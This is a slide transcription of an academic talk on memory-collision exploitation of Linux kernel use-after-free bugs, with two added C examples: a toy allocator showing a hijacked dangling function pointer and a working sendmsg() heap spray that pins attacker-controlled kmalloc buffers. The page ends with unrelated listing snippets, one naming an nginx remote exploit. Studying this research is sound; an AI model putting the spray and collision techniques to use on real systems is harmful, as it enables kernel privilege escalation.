From Collision To Exploitation: Unleashing Use-After-Free Vulnerabilities in Linux Kernel
Slide 1: From Collision To Exploitation: Unleashing Use-After-Free Vulnerabilities in Linux Kernel
Wen Xu, Juanru Li, Junliang Shu, Wenbo Yang, Tianyi Xie, Yuanyuan Zhang, Dawu Gu
Group of Software Security In Progress, Lab of Cryptology and Computer Security, Shanghai Jiao Tong University
CCS 2015
Slide 2: Introduction
- The Linux kernel has become a popular target: a kernel bug gives complete control of the system, and the kernel carries fewer protection and mitigation schemes than user space.
- Exploiting kernel bugs is non-trivial: few documented techniques, unpredictable memory layout.
- Our goal is a generic way of exploiting use-after-free bugs in the Linux kernel.
Slide 3: Use-after-free in the Linux kernel
The example is the custom vulnerable kernel module used later in the evaluation, which exposes numbered operations:
- Option 2 frees an object without clearing the pointer to it. obj[index] is now a dangling pointer: it still points at the freed space.
- Option 3 uses an object without checking whether its pointer is still valid. "Use" here means invoking a function pointer stored in the object.
Slide 4: Exploiting use-after-free bugs
- Our goal is to re-occupy the freed vulnerable object with controllable data.
- Freed memory is reused, which gives the attacker an opportunity to take control of the freed space again.
- Controlled content in the freed space leads to control-flow hijacking or data corruption at the later use.

Slide 5: Challenges
- Stability: the hole should be re-occupied by our candidates, but hundreds of scheduled tasks all affect the kernel allocators.
- Separation: the hole should be re-occupied by proper candidates, but different types of kernel objects cannot be stored in the same memory region because of SLAB/SLUB caches.
- Data control: the hole should be filled with meaningful content, but the content of kernel objects is usually not fully controlled by users.
- Universality: one strategy regardless of the type of the vulnerable object.
Slide 6: Insight: memory collision
- The kernel recycles free memory for future use, because of memory limitations and performance requirements. This reduces the entropy of the memory layout.
- Memory collision attack strategy: use proper candidates and let the kernel choose them to occupy the recently freed space; in other words, collide with the freed hole.
- Probabilistic model with a high success rate.

Slide 7: Overview
- Object-based memory collision attack. Candidate: kernel buffers allocated by the kernel allocators.
- Physmap-based memory collision attack. Candidate: physmap. Generic, stable and reliable.

Slide 8: Overview (figure only)
Slide 9: Object-based attack
- Intuitive strategy: use kernel objects to overwrite kernel objects.
- Kernel objects are stored in various kinds of SLAB caches. Different caches hold different objects, which implies a natural separation.
- How to insert an object of type A into the cache storing vulnerable objects of type B?

Slide 10: Object-based attack (figure only)
Slide 11: Object-based attack #1: collisions between objects of the same size
- Savior: the newly adopted SLUB allocator puts objects of the same size into one cache for better performance (slab merging; the slub_nomerge boot parameter disables it).
- Candidate: kmalloc() buffers, commonly used by the kernel to store temporary data.
- Easy to create from user space with sendmmsg(): the length of the control message sets the buffer size and the data of the control message sets its content. Both are passed from user space.

Slide 12: Object-based attack #1: collisions between objects of the same size
- The length of the message buffer must equal the size of the vulnerable object (512 in the example).
- Limitation: kmalloc() allocates from rounded size classes such as 32, 48, 64, 128, 256, 512, 1024. What if the vulnerable object is 576 bytes? 512 < 576 < 1024: an object of that size lives in a dedicated cache, not in kmalloc-512 or kmalloc-1024, so no kmalloc() buffer can collide with it.
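The three operations of slide 3 and the same-size collision of slides 11 and 12, played out against a toy model of SLUB's kmalloc caches. This is an added example, not code from the slides or from the kernel: the allocator is a deliberately small stand-in (size classes with LIFO free lists in a static arena), `struct victim` is a hypothetical object layout, and the "spray" is a single buffer filled the way the control message of slide 11 would be. The toy only models kmalloc size classes, so a 576-byte victim is placed in its 1024-byte class; a real kernel gives such an object a dedicated cache that no kmalloc() request reaches, which is the limitation slide 12 raises. The `clear_ptr` flag adds the defensive counterpart the bug lacks: clear the pointer on free and check it before use.

```c
#include <stddef.h>
#include <string.h>

/* Toy model of SLUB's kmalloc caches: a handful of size classes, each with a
 * LIFO free list carved out of a static arena. Illustration only, not kernel code. */
#define ARENA_BYTES (64 * 1024)
#define MAX_FREE    64

static const size_t kmalloc_sizes[] = { 32, 48, 64, 128, 256, 512, 1024, 2048 };
#define NCACHES (sizeof kmalloc_sizes / sizeof kmalloc_sizes[0])

struct toy_cache { size_t size; void *freelist[MAX_FREE]; int nfree; };

static _Alignas(64) unsigned char arena[ARENA_BYTES];
static size_t arena_top;
static struct toy_cache caches[NCACHES];

static void caches_init(void)
{
    arena_top = 0;
    for (size_t i = 0; i < NCACHES; i++) {
        caches[i].size = kmalloc_sizes[i];
        caches[i].nfree = 0;
    }
}

/* kmalloc() rounds a request up to a size class: 512 -> 512, 576 -> 1024. */
static struct toy_cache *cache_for(size_t n)
{
    for (size_t i = 0; i < NCACHES; i++)
        if (n <= kmalloc_sizes[i])
            return &caches[i];
    return NULL;
}

static void *toy_kmalloc(size_t n)
{
    struct toy_cache *c = cache_for(n);
    if (!c)
        return NULL;
    if (c->nfree > 0)                          /* most recently freed slot is handed out first */
        return c->freelist[--c->nfree];
    if (arena_top + c->size > ARENA_BYTES)
        return NULL;
    void *p = arena + arena_top;
    arena_top += c->size;
    return p;
}

static void toy_kfree(void *p, size_t n)
{
    struct toy_cache *c = cache_for(n);
    if (c && c->nfree < MAX_FREE)
        c->freelist[c->nfree++] = p;
}

/* The vulnerable object: some data plus a function pointer, as on slide 3.
 * The field layout is hypothetical. */
struct victim { char name[24]; void (*fn)(void); };

static int hijacked;
static void legit_fn(void)    { hijacked = 0; }
static void attacker_fn(void) { hijacked = 1; }

/* Play the operations of slide 3 against a victim of obj_size bytes, then
 * "spray" one kmalloc buffer of spray_size bytes filled with fake victims whose
 * fn points at attacker_fn. With clear_ptr set, the free step also clears the
 * pointer and the use step checks it. Returns 1 if the dangling pointer ends up
 * calling attacker_fn, 0 otherwise. */
int uaf_collision(size_t obj_size, size_t spray_size, int clear_ptr)
{
    caches_init();
    hijacked = 0;
    if (obj_size < sizeof(struct victim) || spray_size > 2048)
        return 0;

    struct victim *obj = toy_kmalloc(obj_size);         /* option 1: allocate */
    if (!obj)
        return 0;
    obj->fn = legit_fn;

    toy_kfree(obj, obj_size);                           /* option 2: free ... */
    struct victim *dangling = obj;                      /* ... pointer not cleared */
    if (clear_ptr)
        dangling = NULL;                                /* the fix: clear it */

    /* Attacker's buffer: the fake object repeated, so the function pointer sits
     * at the offset the kernel will read no matter which slot the victim had. */
    unsigned char payload[2048];
    struct victim fake = { "owned", attacker_fn };
    memset(payload, 0, sizeof payload);
    for (size_t off = 0; off + sizeof fake <= spray_size; off += sizeof fake)
        memcpy(payload + off, &fake, sizeof fake);
    void *buf = toy_kmalloc(spray_size);
    if (!buf)
        return 0;
    memcpy(buf, payload, spray_size);                   /* copy_from_user() of the cmsg data */

    if (dangling)                                       /* option 3: use (the fix checks first) */
        dangling->fn();
    return hijacked;
}
```

uaf_collision(512, 512, 0) returns 1: the 512-byte buffer is handed the slot the victim just left. uaf_collision(576, 512, 0) returns 0, because the buffer comes from a different size class and the stale function pointer is still the legitimate one. uaf_collision(512, 512, 1) returns 0 even though the collision happens, because the cleared pointer is never dereferenced.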
Slide 13: Object-based attack #2: collisions between objects of different sizes
- If all objects in a slab (the pages backing part of a cache) are freed, those pages are returned to the kernel's page allocator.
- Will that space definitely be reused for a slab of the original object type? No. The kernel does not care about the history of free memory. Memory is just memory.
- Chances are the pages will back a new slab that stores objects of a different type.

Slide 14: Object-based attack #2: collisions between objects of different sizes
- The attack code stays the same. The size of our message buffer no longer matters: pick whichever kmalloc() size you prefer.
- Discussion: in theory collisions always happen eventually; in practice such a blind strategy suffers a low success rate, usually because resource limits keep one user from owning many kmalloc() buffers in the kernel at once.
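The user-space side of the kmalloc() candidate from slide 11, as an added example rather than the authors' exploit code. The slide names sendmmsg(); this example uses sendmsg(), which takes the same per-message kernel path: ___sys_sendmsg() copies ancillary data longer than its small on-stack buffer into a sock_kmalloc()'d buffer of exactly msg_controllen bytes and frees it when the send returns. Two details are assumptions to verify against the target kernel: that __scm_send() skips control messages whose level is not SOL_SOCKET rather than rejecting them, and that a sender blocked on a full AF_UNIX stream socket keeps that buffer allocated while it sleeps. The payload pattern and the 512-byte size are placeholders for the real fake object and the victim's size class.

```c
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

#define SPRAY_PROCS 8
#define CTL_LEN     512                     /* kmalloc size class to collide with (placeholder) */

/* Control-message buffer shared by the sprayers (aligned for struct cmsghdr). */
static unsigned char spray_ctl[CTL_LEN] __attribute__((aligned(8)));

/* Lay out one control message that spans the whole buffer: a cmsghdr whose
 * cmsg_len equals ctl_len, followed by `pattern` repeated up to the end. The
 * level is deliberately not SOL_SOCKET, because __scm_send() skips entries of
 * other levels instead of rejecting them (assumption; check the target kernel).
 * Returns the number of payload bytes after the header, 0 if it does not fit. */
size_t build_spray_cmsg(unsigned char *ctl, size_t ctl_len,
                        const unsigned char *pattern, size_t pattern_len)
{
    size_t hdr = CMSG_LEN(0);               /* aligned sizeof(struct cmsghdr) */
    if (ctl_len < hdr || pattern_len == 0)
        return 0;
    memset(ctl, 0, ctl_len);
    struct cmsghdr *cm = (struct cmsghdr *)ctl;
    cm->cmsg_len   = ctl_len;               /* one cmsg covers the entire buffer */
    cm->cmsg_level = IPPROTO_IP;            /* anything except SOL_SOCKET (SOL_IP on Linux) */
    cm->cmsg_type  = 0;
    unsigned char *body = CMSG_DATA(cm);
    size_t body_len = ctl_len - hdr;
    for (size_t off = 0; off < body_len; off += pattern_len) {
        size_t n = body_len - off < pattern_len ? body_len - off : pattern_len;
        memcpy(body + off, pattern, n);
    }
    return body_len;
}

/* Sprayer: send 1-byte messages carrying spray_ctl as ancillary data to a peer
 * that never reads. ___sys_sendmsg() copies the ancillary data into a
 * kmalloc(ctl_len) buffer before the send; once the socket's send buffer is
 * full the caller sleeps inside sendmsg() with that buffer still allocated, so
 * every blocked sprayer pins one ctl_len-sized slot of attacker data. */
static void sprayer(int fd)
{
    char byte = 'x';
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = spray_ctl, .msg_controllen = sizeof spray_ctl,
    };
    while (sendmsg(fd, &msg, 0) > 0)
        ;
}

int main(void)
{
    static const unsigned char fake[] = "FAKE-OBJ";   /* stand-in for the fake object */
    if (!build_spray_cmsg(spray_ctl, sizeof spray_ctl, fake, sizeof fake - 1))
        return 1;

    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) {
        perror("socketpair");
        return 1;
    }
    pid_t kids[SPRAY_PROCS];
    int nkids = 0;
    for (int i = 0; i < SPRAY_PROCS; i++) {
        pid_t pid = fork();
        if (pid < 0) {
            perror("fork");
            break;
        }
        if (pid == 0) {
            sprayer(sv[0]);                 /* never returns while sv[1] goes unread */
            _exit(0);
        }
        kids[nkids++] = pid;
    }
    sleep(1);                               /* sprayers are now parked inside sendmsg() */
    printf("%d sprayers blocked, each pinning a kmalloc-%d buffer; trigger the UAF now\n",
           nkids, CTL_LEN);
    for (int i = 0; i < nkids; i++) {      /* tear down: killing a sprayer frees its buffer */
        kill(kids[i], SIGKILL);
        waitpid(kids[i], NULL, 0);
    }
    return 0;
}
```

Each blocked sprayer holds exactly one buffer, and sock_kmalloc() charges it against the socket's optmem limit, so the number of buffers one user can keep resident is bounded: that is the resource limitation slide 14 points at. On Linux, compare the kmalloc-512 object counts in /proc/slabinfo (root) before and during the sleep.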
Slide 15: Physmap-based attack
- Get rid of the restrictions imposed by the kernel allocators. Again, memory is just memory: the kernel never guarantees that memory once used for kernel objects stays reserved for kernel objects.
- We choose a candidate known as physmap to achieve a generic and stable attack against use-after-free vulnerabilities in the Linux kernel.

Slide 16: Physmap-based attack
- Physmap is the kernel's direct mapping of physical memory: a region of kernel address space that maps physical RAM linearly (all of it on 64-bit, the lowmem part on 32-bit). Every physical page is reachable through it, so the pages backing a user process's mmap()ed memory are visible in kernel space as well, at a kernel address.

Slide 17: Physmap-based attack
An EXCELLENT choice:
- Easy creation: iteratively mmap() in user space.
- Data control: the contents are fully controlled by the attacker.
- Large size: as the attacker maps and fills more pages, the page allocator hands out free physical pages, including pages just released by the slab allocator, so the crafted payload grows into the kernel's free memory and appears there through physmap.
- Table [1] from ret2dir: Rethinking Kernel Isolation (USENIX Security 2014).
Slide 18: Physmap-based attack
- An intuitive strategy: create a large number of vulnerable objects, free all of them, then spray through physmap and hope the collision happens.
- Is there a more reliable approach?

Slide 19: Physmap-based attack
- We spray vulnerable objects in groups. In each group, N objects are treated as vulnerable ones, on which we later trigger the UAF, and M (M >> N) objects are padding, which we simply release in the normal way.
- Result: (1) large pieces of freed memory wait to be occupied by physmap pages carrying the payload; (2) the freed vulnerable objects are scattered all over kernel space. Both sharply increase the reliability of this probabilistic attack.

Slide 20: Physmap-based attack
- In practice, users can read back certain data from many kernel objects through specific syscalls. That tells the attacker that the collision has already happened and the spraying should stop, which further increases reliability.
Slide 21: Security effectiveness
- The physmap-based attack bypasses the separation enforced by the kernel allocators entirely and achieves the overwrite.
- Physmap reflects the mmap() area of user space, so its content is fully under the attacker's control.
- Physmap works regardless of the type and size of the vulnerable object that carries the use-after-free.
- Spraying tricks and potential information leaks increase the probability that the memory collision happens.
- The physmap-based attack leverages an inherent working mechanism of the kernel, which cannot be mitigated easily.
Slide 22: Evaluation
- Performance of all these attacks against the custom vulnerable kernel module (results table not preserved in this transcription). The attacks perform worse on the 64-bit Linux platform, and both the physmap-based attack and object-based attack #1 have a high success rate.

Slide 23: Evaluation
- We achieve a reliable universal root on diverse Android devices by leveraging a CVE (number not preserved here), a typical use-after-free vulnerability in the Linux kernel credited to the author, based on the physmap-based attack. This shows that our attack applies on both x86/x86_64 and ARM.
Slide 24: Conclusion
- We propose novel attack techniques to unleash use-after-free vulnerabilities in the Linux kernel, featuring reliability and universality.
- Countermeasures: impose restrictions on the memory resources available to a single user; isolate memory of different usages from each other.

Slide 25: Thank you! Q&A
Shanghai Jiao Tong University
More informationDocumentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
Documentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit about a generic way to exploit Linux targets written by Kingcope Introduction In May 2013 a security advisory was announced
More informationDepartment of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I
Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY 6.893 Fall 2009 Quiz I All problems are open-ended questions. In order to receive credit you must answer
More informationRun-Time Environments/Garbage Collection
Run-Time Environments/Garbage Collection Department of Computer Science, Faculty of ICT January 5, 2014 Introduction Compilers need to be aware of the run-time environment in which their compiled programs
More informationSpectre, Meltdown, and the Impact of Security Vulnerabilities on your IT Environment. Orin Jeff Melnick
Spectre, Meltdown, and the Impact of Security Vulnerabilities on your IT Environment Orin Thomas @orinthomas Jeff Melnick Jeff.Melnick@Netwrix.com In this session Vulnerability types Spectre Meltdown Spectre
More informationAutomatic Garbage Collection
Automatic Garbage Collection Announcements: PS6 due Monday 12/6 at 11:59PM Final exam on Thursday 12/16 o PS6 tournament and review session that week Garbage In OCaml programs (and in most other programming
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 14: Software Security Department of Computer Science and Engineering University at Buffalo 1 Software Security Exploiting software vulnerabilities is paramount
More informationVersion:1.1. Overview of speculation-based cache timing side-channels
Author: Richard Grisenthwaite Date: January 2018 Version 1.1 Introduction This whitepaper looks at the susceptibility of Arm implementations following recent research findings from security researchers
More information